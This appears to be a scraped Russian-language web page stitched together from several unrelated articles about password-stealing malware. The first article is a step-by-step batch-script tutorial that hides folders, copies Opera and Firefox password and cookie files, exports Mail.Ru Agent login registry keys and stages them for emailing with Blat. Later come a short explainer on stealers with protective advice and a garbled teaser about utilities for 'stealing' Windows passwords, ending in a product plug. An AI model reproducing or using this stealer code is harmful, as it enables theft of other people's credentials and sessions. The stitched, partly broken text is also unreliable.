Пример Простого Bat Вируса,ворующего Файлы С Паролями.
В этой статье опишу как можно быстро и без особого труда,написать и сделать вирус ворующий файлы с паролями и отправляющий всё это на почтовый ящик.
Начнём с того что вирус будет написан на bat’e(CMD,основные команды Вы можете взять здесь) то есть в обычном текстовом файле и будет выполняться при помощи стандартного,встроенного интреператора Windows- «командной строки».
Для того чтоб написать подобный вирус,нужно знать точное место хранения тех файлов которые и будет он воровать, компоненты Blat которые можно скачать с офф сайта http://www.blat.net/ или же с нашего сервера,так же компонент от архиватора WinRaR Rar.exe(можно обойтись и без него).
Открываем блокнот и копируем туда следующий код:
Код:
md %SystemDrive%passMailAgentreg — создаёт папку reg
attrib %systemroot%wincs +h +s +r — ставит атрибуты на папку wincs тем самым скрывая её от глаз.
attrib %SystemDrive%pass +h +s +r — тоже самое что и выше.
Как делаются трояны, ворующие пароли? Рассказываю свой пример
copy /y «%systemroot%blat.exe» «%systemroot%wincsblat.exe» — копирует файл blat.exe с места выгрузки в папку wincs
copy /y «%systemroot%blat.dll» «%systemroot%wincsblat.dll» — копирует файл blat.dll с места выгрузки в папку wincs
copy /y «%systemroot%blat.lib» «%systemroot%wincsblat.lib» — копирует файл blat.lib с места выгрузки в папку wincs
CD /D %APPDATA%OperaOpera — переходит в папку оперы где располагаются файлы с паролями ( и не только) от оперы.
copy /y wand.dat %SystemDrive%passoperawand.dat — копирует файл wand.dat в папку opera
copy /y cookies4.dat %SystemDrive%passoperacookies4.dat — копирует файл cookies4.dat в папку opera
regedit.exe -ea %SystemDrive%passMailAgentregagent.reg «HKEY_CURRENT_USERsoftwareMail.RuAgentmagent_logins2 — экспортирует ключ реестра magent_logins2 где хранится пароль, в папку reg
regedit.exe -ea %SystemDrive%passMailAgentregagent.reg «HKEY_CURRENT_USERsoftwareMail.RuAgentmagent_logins3 — экспортирует ключ реестра magent_logins3 где хранится пароль, в папку reg
CD /D %APPDATA% — переходим в папку AppData
Xcopy MraBase %SystemDrive%passMailAgent /K /H /G /Q /R /S /Y /E >nul — копирует содержимое папки MraBase в папку MailAgent
Xcopy MraUpdatever.txt %SystemDrive%passMailAgent /K /H /G /Q /R /S /Y >nul — копирует файл ver.txt в папку MailAgent
cd %AppData%MozillaFirefoxProfiles*.default — переходим в папку с профилем браузера Мозилы
copy /y cookies.sqlite %SystemDrive%passMozillacookies.sqlite — копирует файл cookies.sqlite в папку Mozilla
объясните мне как склеять компоненты программы блат и архиватора вин рар…и путь выгрузки как? просто я здесь первый раз…
Источник: expertnov.ru
Самодельный безвредный стилер
Стилер — ПО для кражи паролей пользователя
Стилер — это вредоносное программное обеспечение, предназначенное для кражи сохраненных в системе паролей и отправке их злоумышленнику — рассказывает основатель компании Интернет-Розыск Игорь Бедеров.
Как работает стилер?
Данный вирус пробирается в хранилища часто используемых программ (в основном браузеров) и ворует оттуда все: сохраненные вами файлы Cookie, логины и пароли. Затем, стилер отправляет полученные данные злоумышленнику на почту.
Иногда у такого типа вируса есть дополнительная функция самоудаления. Наивный пользователь даже и не поймет, что его информацию похитили, пока пароль не перестанет подходить к его, например, почте, социальной сети или чего хуже, к электронным кошелькам.
Почему эта атака настолько опасно? Зачастую, антивирусные программы против стилера бессильны, ибо троян можно без труда закриптовать.
Как обезопасить себя от стилера?
Ответ довольно прост. Дело в том, что данный вирус едва ли сможет как-то вам навредить, если вы не сохраняете пароли в браузере, а записываете их где-то в зашифрованных базах. Ну и еще один момент, стилеры, преимущественно, пишут для популярных браузеров.
=================================================
Мы в Telegram: https://t.me/irozysk
Мы в ВКонтакте: https://vk.com/internet.rozysk
Мы в Facebook: https://www.facebook.com/internet.rozysk/
Какие данные о вас собирают социальные сети? Присоединяйтесь к нашему ТГ каналу и узнайте, как обезопасить свой профиль.
Источник: www.securitylab.ru
Кража паролей: как наши учетные записи уводят через npm-пакет
Всем привет, сегодня позволю себе “зацепить” ещё одну тему, которая будет, как мне кажется, интересна многим. Мы создадим специальный инструмент, который позволит нам отобразить и сохранить все пароли, которые сохранены в windows. В вашей или чужой. Проще говоря, украсть пароли .
Разовьём тему. Какими браузерами вы пользуетесь? Сколько их в windows ? Глупый вопрос: вы пользуетесь социальными сетями? Другими социальными проектами? У каждого из нас таких ресурсов не мало. Каждый из них требует пароля, который хранится в этом же браузере.
Это удобно. Но не безопасно, и сейчас вы увидите почему. Есть утилиты, которые позволят украсть паролииз браузеров любых мастей для сайтов.
А хотите узнать пароли ко всем учётным записям пользователей вашей Windows?
Забыли пароль к роутеру? Или у вас отдельный кабель? Никакой разницы – утилита в составе пакета позволит украсть пароли к интернету. Вы приобрели Windows честно за свои кровные? Она была установлена вместе с купленным компьютером и ноутбуком? А ведь всякий раз при выходе в сеть Windows сверяется с базой на предмет результатов проведённой активации.
Уникальный ключ активации Windows – обязательное условие проверки подлинности. Где он хранится, мы тоже поговорим. Есть утилита, которая позволит украсть ключи и пароли к системе. Там же будет и ключ к пакету Microsoft Office…
Почтовые клиенты на компьютере имеются? Microsoft Outlook, Filezilla, Mozilla Thunderburd? При входе в почту почтовый клиент отправляет пароли к почтовым ящикам на сервера почтовых серверов… Есть утилита, которая позволит украсть пароли к почтовым ящикам.
Сейчас я вам покажу, как можно будет выдернуть самое сокровенное из windows всего в пару кликов мышью.
А есть вполне законный вариант восстановить все пароли не спеша. Программа ReCall к вашим услугам, и пароли даже удалённых программ и браузеров в любом виде.